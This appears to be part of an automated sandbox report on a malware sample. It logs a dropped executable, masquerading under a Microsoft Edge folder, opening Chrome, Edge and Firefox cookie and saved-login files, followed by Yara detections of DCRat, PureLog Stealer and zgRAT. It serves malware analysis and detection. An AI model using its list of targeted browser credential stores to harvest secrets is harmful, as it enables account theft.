                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior

                                    Remote Access Functionality

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000009.00000002.2956805434.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000009.00000002.2956805434.0000000002D83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000002.1756943981.0000000012994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: ChainFontruntimeCrt.exe PID: 7412, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: yeeQesPXxpnDuwPWqTnUoVbi.exe PID: 7664, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: 8k1e14tjcx.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.8k1e14tjcx.exe.58c6709.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.ChainFontruntimeCrt.exe.210000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.8k1e14tjcx.exe.6f7e709.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.8k1e14tjcx.exe.6f7e709.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000004.00000000.1706629169.0000000000212000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1697920956.0000000005878000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1696822133.0000000006F30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\OfficeClickToRun.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ChainagentComponent\ChainFontruntimeCrt.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: 8k1e14tjcx.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.8k1e14tjcx.exe.58c6709.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.ChainFontruntimeCrt.exe.210000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.8k1e14tjcx.exe.6f7e709.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.8k1e14tjcx.exe.6f7e709.0.unpack, type: UNPACKEDPE
